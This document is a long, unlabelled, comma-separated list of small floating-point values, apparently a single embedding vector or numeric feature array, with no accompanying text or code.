-0.01241056527942419, -0.03880720213055611, -0.0025377394631505013, 0.02835910953581333, -0.001539228018373251, -0.015091689303517342, 0.004363737069070339, -0.022374950349330902, -0.012942643836140633, 0.011083823628723621, -0.0020350287668406963, -0.02215382643043995, 0.011671182699501514, -0.008969328366219997, -0.012880452908575535, 0.007442193105816841, 0.0264933779835701, 0.018919892609119415, 0.016777757555246353, -0.02699090726673603, 0.0053518833592534065, -0.004301546141505241, -0.012852812185883522, -0.01726146601140499, -0.021296972408890724, 0.005725029855966568, -0.01030989084392786, 0.000784297997597605, -0.031731244176626205, 0.00252910191193223, 0.005818316247314215, -0.005493540782481432, 0.019030455499887466, 0.005617923103272915, -0.007925901561975479, 0.006198372691869736, -0.027875401079654694, -0.033970121294260025, -0.0004478617920540273, -0.0020091156475245953, 0.03272630274295807, 0.0029972621705383062, -0.012762981466948986, 0.01051719393581152, -0.010144047439098358, -0.0015996914589777589, 0.01324668899178505, 0.03759102150797844, -0.007642586249858141, -0.0010857516899704933, -0.006820282898843288, 0.023356186226010323, -0.017620790749788284, -0.013509273529052734, 0.009314834140241146, -0.02820708602666855, 0.027142928913235664, -0.009453036822378635, -0.009646520018577576, 0.023743152618408203, 0.00036234912113286555, 0.014898206107318401, -0.010254609398543835, -0.002197416266426444, -0.01666719652712345, 0.002423722529783845, 0.014760004356503487, 0.006823738105595112, 0.02737787365913391, 0.0004845717630814761, 0.018560567870736122, 0.00677191186696291, -0.012749160639941692, 0.01002657599747181, -0.022623714059591293, -0.012348374351859093, 0.023812253028154373, -0.028414390981197357, -0.0034187790006399155, 0.019334500655531883, -0.00011466471187304705, 0.010510283522307873, 0.024143939837813377, 0.0031354643870145082, -0.01062084548175335, 0.003997500985860825, 0.01596236415207386, -0.001029607024975121, 0.0018691859440878034, -0.006803007330745459, 0.011450059711933136, 0.025539781898260117, -0.030708547681570053, -0.0000193942069017794, 0.004187529440969229, 0.011740284040570259, -0.001244684332050383, -0.00384547864086926, -0.008001912385225296, -0.014677083119750023, 0.01809067837893963, -0.015188431367278099, 0.027626637369394302, 0.005776855628937483, 0.013502363115549088, 0.02050921879708767, 0.006340029649436474, 0.006205282639712095, 0.0304874237626791, 0.005068568978458643, 0.00018495353288017213, 0.006070535629987717, 0.0029074305202811956, -0.016791578382253647, -0.016971241682767868, 0.007601125631481409, -0.010966351255774498, 0.02295539900660515, 0.01634933054447174, 0.029658211395144463, 0.02484877035021782, 0.02891191840171814, -0.013163767755031586, 0.008008822798728943, 0.0018363628769293427, 0.00988837331533432, -0.012396745383739471, -0.007200339343398809, -0.026410456746816635, -0.022596074268221855, -0.0131292175501585, -0.012438206002116203, 0.019099555909633636, -0.025401581078767776, -0.009674159809947014, -0.004909635987132788, 0.007559665013104677, -0.020564500242471695, -0.03944293409585953, -0.010862699709832668, -0.010586295276880264, 0.005217136349529028, -0.007013766095042229, -0.0066509852185845375, -0.00024941193987615407, 0.0006249334546737373, 0.010019665583968163, 0.012134160846471786, 0.0005657656001858413, 0.0010676126694306731, 0.0066509852185845375, -0.026755962520837784, -0.004370647482573986, -0.014953487552702427, -0.000255242339335382, 0.02916068211197853, 0.015630679205060005, -0.011222025379538536, 0.002914340700954199, 0.0033375851344317198, -0.0013120579533278942, -0.016072925180196762, -0.01929304003715515, -0.016653375700116158, -0.007656406611204147, 0.006999945733696222, 0.028607873246073723, 0.017772814258933067, 0.010061126202344894, -0.014276295900344849, 0.003444691887125373, -0.017828095704317093, -0.008485620841383934, -0.014165733940899372, -0.0014044807758182287, 0.011070002801716328, -0.00043101838673464954, 0.009929833933711052, 0.004114972893148661, 0.03280922397971153, 0.0047887093387544155, -0.012673149816691875, 0.011712643317878246, 0.016791578382253647, -0.022623714059591293, 0.013875509612262249, 0.018671128898859024, -0.0023459838703274727, 0.008305957540869713, 0.004899270832538605, -0.03601551428437233, -0.02327326498925686, -0.010475733317434788, -0.0030439053662121296, -0.007552755065262318, 0.0015945088816806674, 0.004401742946356535, 0.008043373003602028, 0.007262530270963907, -0.002627570880576968, 0.032781582325696945, 0.0007294489187188447, 0.0050651137717068195, 0.004989102482795715, -0.006481687072664499, 0.007345451507717371, 0.013626744970679283, -0.002834874438121915, 0.0029955345671623945, -0.00026258433354087174, -0.00036515636020340025, 0.008015732280910015, 0.029934614896774292, -0.003900759620591998, 0.0005022789118811488, -0.015395734459161758, 0.005196406040340662, -0.022554613649845123, 0.011747194454073906, 0.019804388284683228, -0.007138147950172424, -0.020191354677081108, -0.0051376698538661, 0.017302926629781723, -0.02068888209760189, -0.002508371602743864, -0.010634666308760643, -0.008326687850058079, -0.006803007330745459, 0.01634933054447174, 0.0007920718635432422, 0.000028018353987135924, -0.004360282327979803, -0.016611915081739426, 0.005828681401908398, 0.005980703979730606, 0.01188539620488882, -0.012223992496728897, -0.004108062945306301, 0.009231912903487682, -0.002107584848999977, 0.0022302393335849047, 0.0095359580591321, -0.020136073231697083, -0.0003195928002241999, 0.022236747667193413, 0.007186518982052803, -0.006402221042662859, 0.009052249602973461, -0.019762927666306496, 0.0032771218102425337, 0.007635676302015781, -0.00392148969694972, 0.004063147120177746, -0.003501700470224023, 0.010337530635297298, -0.008983148261904716, 0.009107531048357487, 0.006194917485117912, -0.0052516870200634, -0.0047990744933485985, 0.0037625571712851524, 0.0003904214536305517, 0.002442725468426943, -0.012244722805917263, -0.0009864188032224774, 0.0001994215854210779, -0.01517461147159338, -0.016929779201745987, 0.0006910114316269755, -0.0018363628769293427, -0.02016371302306652, 0.009570508264005184, -0.007055226713418961, 0.018505286425352097, 0.00586323207244277, -0.008223036304116249, 0.02489023096859455, 0.0008611729717813432, 0.0179248359054327, 0.015796521678566933, 0.0030715458560734987, 0.012569498270750046, 0.010040395893156528, -0.012334554456174374, 0.006989580579102039, -0.025664163753390312, 0.002294157864525914, -0.00857545156031847, -0.01241056527942419, -0.0047057876363396645, 0.015741240233182907, -0.022388771176338196, -0.009370114654302597, -0.013177587650716305, 0.010945620946586132, -0.0027795934583991766, -0.016528993844985962, 0.0028867002110928297, -0.0005424440023489296, -0.024696748703718185, 0.014221015386283398, -0.00889331754297018, -0.028331467881798744, -0.024282142519950867, 0.019514162093400955, 0.01728910580277443, -0.0244341641664505, 0.018615847453475, 0.006391855888068676, -0.016473712399601936, -0.01293573435395956, -0.0165566336363554, 0.000021729070795117877, 0.005535001400858164, 0.0008188485517166555, 0.021905062720179558, -0.008347418159246445, -0.009874553419649601, -0.00896241795271635, 0.012009778991341591, 0.03250517696142197, 0.004757613874971867, -0.012569498270750046, -0.01062084548175335, -0.00807101372629404, 0.00013215593935456127, 0.018436184152960777, -0.010945620946586132, -0.005469355266541243, -0.008395789191126823, 0.010579384863376617, 0.004353371914476156, -0.012327644042670727, -0.039608776569366455, 0.016404611989855766, 0.020246634259819984, -0.014718543738126755, 0.00584595650434494, 0.0027243124786764383, 0.020080791786313057, 0.018712589517235756, -0.006495507434010506, -0.000024698259949218482, -0.01099399197846651, 0.004584860987961292, 0.005790675990283489, -0.011975227855145931, 0.008603092283010483, -0.00002044691973424051, 0.022001804783940315, -0.02863551303744316, -0.011401688680052757, 0.013702756725251675, -0.005417529493570328, -0.019859667867422104, -0.03853079676628113, -0.008464889600872993, -0.004090787842869759, -0.008354328572750092, -0.01372348703444004, 0.009667250327765942, -0.0023770793341100216, -0.005082388874143362, 0.00647477712482214, -0.01242438517510891, 0.008229945786297321, -0.002216419205069542, 0.009777811355888844, -0.01022005919367075, -0.028414390981197357, 0.024199219420552254, -0.008810395374894142, -0.019154837355017662, -0.019583264365792274, 0.007283260580152273, 0.024309782311320305, -0.02877371571958065, 0.00686865346506238, -0.007918991148471832, 0.014234835281968117, -0.009770901873707771, 0.016128206625580788, 0.01485674548894167, 0.00534842861816287, -0.002948891371488571, -0.010510283522307873, -0.00769095728173852, 0.0021732309833168983, -0.0011228935327380896, 0.005659383721649647, 0.003518975805491209, -0.006530058104544878, -0.024447984993457794, 0.0012757799122482538, 0.005559186916798353, -0.0047057876363396645, 0.022706635296344757, -0.0013569736620411277, -0.009639609605073929, -0.0238675344735384, -0.002145590493455529, -0.0037694673519581556, -0.010745227336883545, 0.009860733523964882, 0.02233348973095417, -0.0011090734042227268, 0.007034496404230595, -0.010461913421750069, -0.00047636599629186094, -0.04226225987076759, -0.006108541041612625, 0.015216072089970112, 0.016252588480710983, 0.020675061270594597, 0.004619411192834377, -0.015146970748901367, 0.02005315199494362, 0.003512065624818206, 0.013032475486397743, 0.009052249602973461, 0.01081432867795229, -0.0036312651354819536, 0.024627648293972015, -0.0060394397005438805, 0.002765773329883814, -0.009985115379095078, 0.0026413912419229746, 0.0031942003406584263, 0.007815339602530003, 0.016404611989855766, 0.013149947859346867, 0.0005864959675818682, 0.016971241682767868, -0.001972837606444955, -0.010150957852602005, 0.018187420442700386, 0.009218092076480389, -0.013716576620936394, 0.005141125060617924, -0.0028849728405475616, -0.0034464194905012846, -0.016155846416950226, -0.003956040367484093, 0.00374528206884861, 0.00343087175861001, 0.019818207249045372, 0.014331577345728874, 0.01893371343612671, -0.000022633323169429787, -0.019997870549559593, -0.00876893475651741, -0.022250568494200706, 0.017095623537898064, 0.0015418193070217967, 0.027184389531612396, -0.005386434029787779, 0.0031631048768758774, -0.005092754028737545, -0.0008542629075236619, 0.005099664442241192, -0.0032391161657869816, 0.021905062720179558, -0.019348319619894028, 0.031233716756105423, -0.012493486516177654, -0.005859776865690947, -0.014621801674365997, -0.0062812939286231995, 0.010475733317434788, -0.017869556322693825, -0.0006629390991292894, -0.002615478355437517, 0.0042600855231285095, -0.02576090581715107, 0.008810395374894142, 0.010793598368763924, 0.009985115379095078, 0.029354166239500046, 0.0028400570154190063, 0.009957474656403065, 0.01592090353369713, -0.023922815918922424, -0.0018121774774044752, 0.008029553107917309, -0.002111039822921157, 0.01484292559325695, 0.02198798395693302, 0.0038282033056020737, 0.008547811768949032, -0.009722530841827393, 0.02541540004312992, -0.016915960237383842, -0.01382713858038187, 0.004771433770656586, -0.009038429707288742, 0.004881995730102062, 0.011477699503302574, -0.0013353795511648059, 0.0205506794154644, 0.0026863068342208862, -0.0041322484612464905, 0.0045364899560809135, 0.00003814059164142236, -0.022775737568736076, -0.006830648053437471, -0.004025141708552837, -0.007898260839283466, 0.011698823422193527, 0.006623344495892525, 0.01020623929798603, -0.02247169241309166, 0.007186518982052803, 0.014483599923551083, -0.006108541041612625, -0.0027139473240822554, -0.02916068211197853, 0.015478655695915222, 0.011837026104331017, 0.010441183112561703, 0.024019557982683182, -0.004560675472021103, 0.0014960397966206074, 0.006854833569377661, 0.0007804110064171255, -0.020329555496573448, 0.005420984700322151, -0.038447875529527664, -0.006001434288918972, -0.01071067713201046, -0.01621112786233425, -0.003589804284274578, 0.01503640878945589, 0.016224948689341545, -0.0031510121189057827, 0.008547811768949032, 0.010171688161790371, 0.00997820496559143, -0.024600006639957428, -0.0019331044750288129, -0.014082812704145908, 0.009439215995371342, -0.03770158439874649, -0.008326687850058079, -0.011208205483853817, -0.0204401183873415, -0.004128793254494667, 0.007414552848786116, -0.03756337985396385, -0.0011634904658421874, 0.007442193105816841, -0.0052136811427772045, -0.0026724867057055235, -0.020675061270594597, 0.03615371882915497, 0.0035362509079277515, -0.0036900010891258717, 0.007131238002330065, 0.01221708208322525, 0.019154837355017662, -0.0011116646928712726, -0.022803377360105515, -0.013295060023665428, -0.00048759495257399976, -0.015091689303517342, -0.0006918751751072705, 0.00938393548130989, 0.014953487552702427, 0.0048094396479427814, 0.04397596791386604, -0.010676126927137375, -0.004909635987132788, -0.03112315572798252, -0.013377981260418892, 0.015976184979081154, -0.009715620428323746, -0.00968107022345066, 0.01673629693686962, -0.03938765078783035, -0.007010310888290405, -0.01431775651872158, -0.033057987689971924, 0.003396321088075638, -0.026576299220323563, 0.008478710427880287, -0.01172646414488554, -0.012244722805917263, 0.015146970748901367, -0.008672193624079227, -0.007856800220906734, -0.003470605006441474, -0.006882473826408386, -0.020426297560334206, -0.013516183942556381, 0.016653375700116158, 0.03137191757559776, 0.013488543219864368, -0.013778767548501492, -0.0023667141795158386, -0.000991601380519569, -0.0049165464006364346, -0.005103119648993015, 0.013523093424737453, -0.024213040247559547, -0.013460902497172356, -0.007359271869063377, -0.002764045726507902, -0.0015115875285118818, 0.04458405822515488, 0.01274225115776062, -0.008900227025151253, -0.0007195156649686396, -0.010019665583968163, 0.001540091703645885, -0.0085063511505723, 0.01802157796919346, 0.00033168549998663366, 0.007380002178251743, 0.011014722287654877, -0.011602082289755344, 0.0018484556348994374, -0.00027985963970422745, -0.010102586820721626, -0.015423375181853771, -0.0018709134310483932, -0.010441183112561703, 0.004173709079623222, -0.007856800220906734, -0.009169721975922585, 0.01739966869354248, 0.008409609086811543, -0.012369104661047459, -0.014898206107318401, -0.02594056911766529, -0.0024772759061306715, 0.022969219833612442, 0.01824270188808441, 0.0009976477595046163, -0.0033531328663229942, 0.000015547757357126102, 0.015451015904545784, -0.013606014661490917, -0.0028020513709634542, -0.0014398950152099133, -0.012493486516177654, 0.007974271662533283, 0.0014580341521650553, -0.0011945860460400581, 0.012071969918906689, -0.03667888790369034, 0.0054555353708565235, -0.005248231813311577, -0.015146970748901367, -0.020357197150588036, -0.011304946616292, -0.0069377548061311245, 0.014117363840341568, -0.013295060023665428, -0.02068888209760189, -0.0018329077865928411, -0.010731407441198826, 0.01022005919367075, 0.010496463626623154, 0.01603146456182003, 0.005493540782481432, -0.02327326498925686, -0.015865622088313103, -0.02037101611495018, 0.00003770870898733847, -0.019901128485798836, 0.009687980636954308, -0.010130227543413639, -0.004097697790712118, 0.014773824252188206, -0.029989896342158318, -0.022831017151474953, 0.007469833362847567, -0.006979215424507856, 0.005991069134324789, 0.011878486722707748, -0.008872587233781815, -0.010040395893156528, -0.019583264365792274, 0.012431295588612556, 0.017510229721665382, -0.001177310710772872, -0.02849731221795082, 0.000863764260429889, -0.003997500985860825, -0.009003878571093082, 0.0002392627066001296, -0.009314834140241146, 0.005600647535175085, -0.0024289051070809364, -0.008838036097586155, -0.00978472176939249, -0.001450260286219418, -0.019541803747415543, -0.013060116209089756, -0.010613935999572277, -0.0015046773478388786, -0.011021632701158524, -0.0053415182046592236, 0.01081432867795229, 0.0012896000407636166, -0.00413915840908885, -0.0212416909635067, 0.006882473826408386, -0.006312389392405748, 0.008513260632753372, -0.015423375181853771, -0.004377557430416346, 0.021227871999144554, -0.015312813222408295, -0.030542705208063126, -0.009998935274779797, 0.01424865610897541, -0.008596181869506836, 0.011961407959461212, -0.015216072089970112, -0.008851855993270874, -0.011864665895700455, 0.02806888520717621, -0.0009829637128859758, 0.010054216720163822, 0.01956944353878498, 0.04577259719371796, -0.011194385588169098, 0.009916014038026333, 0.024738209322094917, 0.01742730848491192, -0.02146281488239765, 0.007677136920392513, -0.005289692431688309, -0.007262530270963907, 0.0049269115552306175, 0.008271406404674053, -0.00778769887983799, -0.016294049099087715, -0.012147980742156506, -0.02103438787162304, -0.007241799961775541, -0.02377079240977764, -0.014359217137098312, 0.03308562561869621, 0.015934724360704422, -0.008865676820278168, -0.0009544595377519727, -0.00997820496559143, 0.017454948276281357, -0.000991601380519569, -0.007221069652587175, 0.016598094254732132, 0.006460956763476133, 0.007988092489540577, -0.005738849751651287, -0.021932702511548996, -0.023328546434640884, 0.029105400666594505, 0.00484744505956769, -0.007131238002330065, -0.021020567044615746, 0.005946153309196234, 0.007988092489540577, 0.02173922024667263, -0.005728484597057104, 0.006229468155652285, -0.013903150334954262, -0.018367083743214607, -0.0036036246456205845, 0.011063093319535255, 0.01648753322660923, 0.019901128485798836, -0.0210067480802536, -0.01498112827539444, 0.005904692690819502, 0.0035725291818380356, 0.023038320243358612, -0.004474299028515816, 0.03405304253101349, -0.0036761807277798653, -0.024005737155675888, -0.011975227855145931, -0.04754158481955528, 0.021974163129925728, 0.008706743828952312, 0.005776855628937483, -0.005576462019234896, 0.0073523614555597305, 0.0036139898002147675, -0.016501352190971375, 0.014221015386283398, -0.016294049099087715, 0.024406524375081062, -0.00043965602526441216, -0.0027243124786764383, -0.009128261357545853, 0.002470365958288312, -0.0030836386140435934, 0.004104607738554478, -0.005759580060839653, 0.0007799791637808084, -0.002237149514257908, 0.014994948171079159, 0.013688936829566956, -0.013060116209089756, 0.011871576309204102, 0.0033220374025404453, 0.004940731916576624, 0.0030819110106676817, -0.01854674704372883, -0.0033082172740250826, 0.025719445198774338, -0.00047722976887598634, 0.005638653412461281, -0.0027916862163692713, 0.013564554043114185, -0.0008983148727566004, 0.011353317648172379, 0.006523147691041231, 0.0024565455969423056, -0.010565564967691898, 0.022444050759077072, 0.009066070429980755, 0.009356294758617878, -0.020882366225123405, 0.0016256043454632163, 0.00374528206884861, -0.02222292684018612, -0.003147557144984603, -0.022844837978482246, -0.014884386211633682, -0.019790567457675934, 0.005023653153330088, -0.012486576102674007, 0.012472756206989288, -0.005856321658939123, 0.02996225655078888, -0.0013897967291995883, -0.01536809466779232, -0.01261786837130785, 0.016888318583369255, -0.0006219102651812136, 0.017137084156274796, -0.020840905606746674, -0.0009967839578166604, -0.021448994055390358, -0.004712698049843311, 0.026755962520837784, 0.012327644042670727, 0.010807419195771217, 0.014414498582482338, -0.0028849728405475616, 0.0002049280737992376, -0.01459416188299656, 0.006999945733696222, -0.020675061270594597, 0.011754104867577553, -0.012749160639941692, -0.0021058572456240654, 0.007380002178251743, 0.003980225883424282, -0.02607877179980278, -0.0031406469643115997, 0.008064103312790394, -0.026783602312207222, -0.003814383177086711, 0.0016558361239731312, -0.00435682712122798, -0.0038074729964137077, 0.004488119389861822, -0.010586295276880264, -0.0012196351308375597, 0.022070905193686485, 0.0028849728405475616, 0.008292136713862419, -0.0013768402859568596, 0.0061223614029586315, 0.0025964754167944193, -0.005120394751429558, -0.0031803802121430635, 0.0007026722305454314, 0.02491787262260914, -0.006108541041612625, -0.000015628735127393156, -0.011380958370864391, -0.008361238054931164, -0.003396321088075638, 0.019348319619894028, 0.005089299287647009, 0.014290116727352142, -0.008333598263561726, 0.01556157786399126, -0.0017828095005825162, 0.012445115484297276, 0.0017093895003199577, 0.003814383177086711, -0.00838196836411953, -0.012258542701601982, 0.001451987773180008, -0.03806091099977493, -0.0077324179001152515, -0.011304946616292, 0.007037951610982418, 0.02205708436667919, -0.0077531482093036175, -0.0013872054405510426, -0.0018346353899687529, 0.03825439140200615, 0.006212192587554455, -0.00545899011194706, -0.010296070016920567, 0.00004378205267130397, 0.010945620946586132, -0.016017645597457886, 0.005179130472242832, -0.021062027662992477, -0.003187290159985423, -0.016957420855760574, -0.0105033740401268, 0.0038074729964137077, 0.003413596423342824, 0.004187529440969229, -0.0002245787181891501, -0.00807101372629404, 0.017579330131411552, 0.003918034955859184, 0.0011349862907081842, 0.004830169957131147, -0.0004128793370909989, 0.025525962933897972, -0.007912080734968185, 0.017869556322693825, 0.009349384345114231, -0.00158846250269562, 0.008838036097586155, -0.0034360543359071016, -0.0002237149456050247, -0.022831017151474953, 0.010731407441198826, -0.013992981053888798, -0.008347418159246445, -0.004826714750379324, 0.01799393817782402, 0.0324222557246685, 0.004246265161782503, -0.02468292787671089, 0.0022181468084454536, 0.004329186398535967, 0.018532926216721535, 0.02012225240468979, -0.00811938475817442, 0.00959123857319355, 0.004716152790933847, 0.015091689303517342, 0.006443681661039591, -0.00988837331533432, 0.004761068616062403, -0.013101576827466488, 0.02489023096859455, 0.0022907028906047344, -0.019859667867422104, -0.00425317557528615, -0.0020643966272473335, 0.02068888209760189, -0.0017629428766667843, -0.00007979022484505549, -0.010226969607174397, -0.018740229308605194, -0.0037003662437200546, 0.024171579629182816, 0.008900227025151253, -0.005158400163054466, -0.01952798292040825, 0.014566521160304546, -0.010074947029352188, 0.007186518982052803, -0.020785624161362648, -0.004014776553958654, -0.00307672843337059, 0.007773878518491983, 0.019486522302031517, 0.006820282898843288, -0.0015046773478388786, -7.996567887857964e-7, -0.0013267419999465346, 0.012300003319978714, 0.005642108153551817, 0.01294955424964428, 0.0011945860460400581, 0.002834874438121915, 0.0002388308203080669, 0.008375058881938457, -0.01879551075398922, -0.01260404847562313, -0.005120394751429558, -0.01824270188808441, -0.012203262187540531, -0.012452025897800922, -0.009211182594299316, -0.021020567044615746, -0.008651463314890862, -0.010365171357989311, -0.0066751702688634396, 0.013495453633368015, 0.003354860469698906, 0.026092590764164925, 0.019928770139813423, -0.003969860728830099, -0.00817466527223587, 0.010019665583968163, -0.004228990059345961, -0.0022768827620893717, 0.02905012108385563, -0.030515065416693687, 0.011332587338984013, -0.0018847336759790778, 0.007628766354173422, -0.004425927996635437, 0.0017707167426124215, -0.009542867541313171, -0.016404611989855766, 0.01988730952143669, -0.02103438787162304, -0.0027623181231319904, -0.009805452078580856, 0.009964385069906712, 0.0035552538465708494, -0.007573485374450684, -0.0065680635161697865, -0.006070535629987717, 0.015298993326723576, -0.008630733005702496, 0.021379893645644188, -0.03797798976302147, 0.014048262499272823, -0.00605671526864171, 0.013170678168535233, -0.013592194765806198, 0.016584273427724838, 0.03919416666030884, -0.019154837355017662, -0.013046295382082462, -0.0046954224817454815, 0.014221015386283398, -0.005230956710875034, -0.0037280067335814238, 0.007400732487440109, 0.006768457125872374, -0.012963374145328999, 0.012804442085325718, -0.00021885627938900143, 0.009370114654302597, 0.0007769559742882848, 0.004643596708774567, -0.002684579463675618, -0.006336574908345938, -0.002520464127883315, -0.0007916399626992643, -0.022775737568736076, -0.003258118871599436, -0.002639663638547063, 0.023190343752503395, -0.012963374145328999, 0.015768880024552345, -0.01872641034424305, -0.003323765005916357, 0.012369104661047459, -0.02176686003804207, 0.0004100720980204642, -0.007421462796628475, 0.019348319619894028, 0.02635517530143261, -0.001529726549051702, 0.005503905937075615, 0.014953487552702427, 0.010199328884482384, 0.01142932940274477, 0.0017525777220726013, 0.01001275610178709, -0.01300483476370573, -0.008540901355445385, 0.0178142748773098, 0.007642586249858141, 0.014690903015434742, 0.018988994881510735, -0.011526070535182953, -0.01144314929842949, -0.034744054079055786, -0.0023010680451989174, 0.021711578592658043, -0.013156857341527939, -0.023328546434640884, -0.0024271777365356684, -0.016915960237383842, 0.016570454463362694, 0.015727419406175613, -0.03656832501292229, 0.00896241795271635, -0.009957474656403065, 0.0019555622711777687, -0.020011691376566887, 0.0051376698538661, 0.00027899586712010205, 0.02863551303744316, 0.0021628658287227154, -0.028262367472052574, 0.01799393817782402, 0.013377981260418892, -0.010137137956917286, -0.0019555622711777687, 0.0005536729004234076, 0.02320416457951069, -0.0011488065356388688, -0.00808483362197876, 0.011774835176765919, -0.01051719393581152, -0.015077869407832623, 0.00784297939389944, 0.0018225426319986582, 0.00997820496559143, -0.006830648053437471, -0.0009250915609300137, 0.005735395010560751, 0.004318821243941784, 0.003862753976136446, -0.003776377532631159, 0.00799500197172165, -0.027350232005119324, -0.0032494813203811646, 0.0020263909827917814, 0.00627438398078084, 0.012300003319978714, -0.024088658392429352, -0.007649496663361788, 0.0066717155277729034, -0.012928823940455914, 0.018353262916207314, 0.013640565797686577, 0.00749056413769722, -0.0009700072696432471, -0.022623714059591293, 0.0011108008911833167, 0.008167754858732224, 0.0009570508264005184, -0.007849889807403088, 0.0008149616187438369, -0.008789665065705776, -0.003804018022492528, 0.005320787895470858, 0.01680539734661579, -0.008209215477108955, 0.009024608880281448, 0.027502255514264107, -0.02050921879708767, -0.009556688368320465, -0.022913938388228416, 0.0037003662437200546, 0.012147980742156506, -0.030376862734556198, -0.013516183942556381, 0.0032771218102425337, -0.01938978023827076, -0.020467758178710938, -0.016017645597457886, -0.009459946304559708, 0.017565511167049408, -0.013951520435512066, -0.00048025295836851, -0.018892252817749977, 0.006740816403180361, 0.007960451766848564, 0.007967362180352211, 0.026230793446302414, 0.003011082299053669, -0.0004966644919477403, 0.001264550955966115, 0.00919045228511095, 0.0031821075826883316, -0.025360118597745895, 0.01444213930517435, 0.00768404733389616, -0.008513260632753372, 0.009867643006145954, -0.005735395010560751, 0.004906181246042252, 0.016501352190971375, 0.0036865458823740482, 0.019832028076052666, 0.007283260580152273, -0.003149284515529871, 0.014469779096543789, 0.01120129507035017, -0.0085063511505723, 0.018560567870736122, 0.0034498744644224644, 0.015119330026209354, 0.0026344810612499714, -0.005714664701372385, 0.01241056527942419, -0.004505394492298365, -0.0005929741892032325, -0.0011522615095600486, 0.003315127454698086, -0.007207249291241169, 0.011857756413519382, 0.02740551345050335, -0.014884386211633682, 0.023010680451989174, 0.011284216307103634, -0.014207195490598679, 0.007967362180352211, -0.022775737568736076, -0.02544304169714451, 0.02176686003804207, -0.00988837331533432, 0.022568432614207268, 0.0015124512137845159, 0.01037899125367403, 0.009342474862933159, -0.00739382253959775, -0.0014969034818932414, 0.0011522615095600486, -0.016045285388827324, -0.03283686190843582, -0.02628607489168644, -0.011035452596843243, -0.007324721198529005, -0.001510723726823926, -0.007538934703916311, 0.003924944903701544, 0.005873597227036953, -0.0038316582795232534, -0.019279219210147858, 0.011864665895700455, 0.00880348589271307, 0.026631580665707588, -0.007898260839283466, 0.0157550610601902, 0.021366072818636894, -0.01032371073961258, -0.01728910580277443, 0.018574386835098267, -0.003522430779412389, 0.02701854705810547, 0.00768404733389616, -0.01284590270370245, 0.002059214049950242, 0.0035379785113036633, 0.009542867541313171, -0.014373037964105606, 0.007760058157145977, -0.004698877688497305, 0.0009017699048854411, -0.0017758994363248348, 0.031040232628583908, -0.001128939911723137, 0.000873265671543777, -0.00627438398078084, -0.00007989820005604997, 0.01708180271089077, 0.017800454050302505, 0.012928823940455914, 0.0049372767098248005, -0.011850846000015736, -0.00041719814180396497, 0.00019197161600459367, 0.00020114911603741348, 0.0017594879027456045, 0.03374899923801422, 0.0027484979946166277, 0.010600115172564983, -0.004225534852594137, 0.0014649442164227366, -0.02446180395781994, 0.01845000497996807, 0.011360228061676025, 0.011712643317878246, -0.013688936829566956, -0.009598148986697197, 0.015064049512147903, 0.011159834451973438, -0.020384836941957474, -0.023895176127552986, 0.02096528746187687, -0.008955508470535278, -0.005635198205709457, -0.004470843821763992, -0.0011678093578666449, -0.007103597745299339, -0.0029765316285192966, -0.0024047198239713907, -0.013371070846915245, 0.010531013831496239, 0.01767607219517231, 0.014525060541927814, 0.02048157900571823, 0.012272362597286701, 0.013025565072894096, 0.00031721743289381266, 0.013903150334954262, 0.008257586508989334, -0.007179608568549156, -0.030515065416693687, -0.00857545156031847, -0.017634611576795578, 0.010392812080681324, -0.0018415454542264342, 0.016598094254732132, 0.012265453115105629, 0.003432599361985922, -0.0021732309833168983, 0.021020567044615746, 0.005313877947628498, -0.016446072608232498, 0.03441236913204193, 0.007912080734968185, -0.007248709909617901, 0.009860733523964882, -0.0036450852639973164, -0.005410619545727968, -0.010593205690383911, -0.00919045228511095, 0.003976770676672459, 0.004197894595563412, 0.011809385381639004, 0.022140005603432655, 0.019486522302031517, 0.012362194247543812, 0.01484292559325695, -0.025788547471165657, -0.005932332947850227, 0.018961353227496147, 0.02012225240468979, -0.0015245439717546105, 0.01767607219517231, 0.0029177956748753786, 0.011180564761161804, 0.0016195580828934908, 0.019348319619894028, 0.0033790459856390953, -0.00026733503909781575, 0.005206771194934845, -0.009639609605073929, 0.00637803552672267, -0.01596236415207386, 0.03626428171992302, -0.001227408996783197, -0.008029553107917309, 0.002187051111832261, -0.027557535097002983, 0.025636523962020874, 0.012272362597286701, -0.01373730693012476, 0.0021300427615642548, -0.023231804370880127, 0.013357250951230526, -0.02779247984290123, -0.027806300669908524, 0.049476418644189835, -0.007566574960947037, 0.0029558013193309307, -0.015008768066763878, -0.00005997763219056651, -0.0003815678646788001, 0.016998881474137306, 0.008844946511089802, -0.008478710427880287, 0.0159900039434433, 0.032919783145189285, -0.006858288310468197, -0.0033289475832134485, -0.0047057876363396645, -0.004291180986911058, -0.014607981778681278, 0.008948598057031631, 0.008990058675408363, 0.006837558001279831, -0.01806303858757019, 0.0085063511505723, 0.016542812809348106, -0.017137084156274796, -0.011899217031896114, -0.009632699191570282, 0.005116939544677734, 0.005697389133274555, -0.0068099177442491055, -0.012908093631267548, -0.031869448721408844, 0.020592140033841133, 0.005148035008460283, 0.01080050878226757, -0.01735820807516575, -0.005182585678994656, -0.0029350710101425648, 0.009114440530538559, 0.001941742142662406, 0.004854355473071337, 0.009135170839726925, -0.013467812910676003, -0.033196188509464264, -0.0047057876363396645, 0.0060394397005438805, 0.012942643836140633, -0.00938393548130989, 0.015077869407832623, 0.019016634672880173, 0.014801464974880219, -0.020260455086827278, -0.0031060962937772274, 0.0072141592390835285, -0.0057319398038089275, 0.010931801050901413, -0.002765773329883814, -0.008112474344670773, 0.009646520018577576, 0.007110507693141699, 0.0025826552882790565, 0.02146281488239765, -0.024157758802175522, 0.00123604666441679, 0.022444050759077072, 0.00039668375393375754, -0.01806303858757019, -0.015008768066763878, -0.014207195490598679, 0.010565564967691898, -0.009480676613748074, -0.013060116209089756, -0.011063093319535255, -0.0063987658359110355, 0.0179248359054327, 0.019749106839299202, -0.023024501278996468, 0.011132193729281425, -0.008043373003602028, 0.01817360147833824, -0.01767607219517231, -0.017454948276281357, 0.0014062082627788186, 0.0006663941312581301, -0.006350395269691944, -0.01592090353369713, 0.006968850269913673, -0.030266299843788147, -0.01802157796919346, 0.013688936829566956, 0.0034878801088780165, -0.007359271869063377, 0.011228935793042183, 0.0007134692859835923, -0.009169721975922585, 0.013688936829566956, -0.010807419195771217, -0.00817466527223587, 0.012389834970235825, -0.011899217031896114, -0.013840959407389164, 0.004242810420691967, 0.0027312226593494415, 0.03126135841012001, 0.0026534839998930693, -0.0004543400136753917, -0.0009665522375144064, 0.00028374657267704606, 0.008589272387325764, -0.006108541041612625, -0.016045285388827324, 0.005821771454066038, -0.021573377773165703, -0.002924705855548382, 